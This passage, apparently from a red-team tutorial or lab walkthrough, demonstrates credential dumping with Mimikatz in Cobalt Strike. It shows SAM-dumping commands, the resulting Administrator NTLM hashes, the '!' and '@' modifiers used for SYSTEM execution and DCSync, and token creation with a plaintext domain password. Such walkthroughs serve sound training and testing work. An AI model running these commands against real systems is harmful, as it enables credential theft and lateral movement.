In this section we will talk about credential dumping.
first let’s start by dumping the SAM file.
mimikatz token::elevate ; lsadump::sam
we got the administrator hash
User : Administrator
Hash NTLM: fc525c9683e8fe067095ba2ddc971889
lm - 0: 91b6e660bcac036ae7ab67a3d383bc82
ntlm- 0: fc525c9683e8fe067095ba2ddc971889
In Cobalt Strike Mimiatz we can add “!” to make sure that the command is executed as System
now let’s try it.
mimikatz !lsadump::sam
and we got the same output!.
In Cobalt Strike Mimikatz we can add “@” to make sure if are trying to peform an action like DCSync on another machine it can be impersonated.
Now let’s token impersonation
getuid
now let’s make a new token.
make_token DEV\\nlamb F3rrari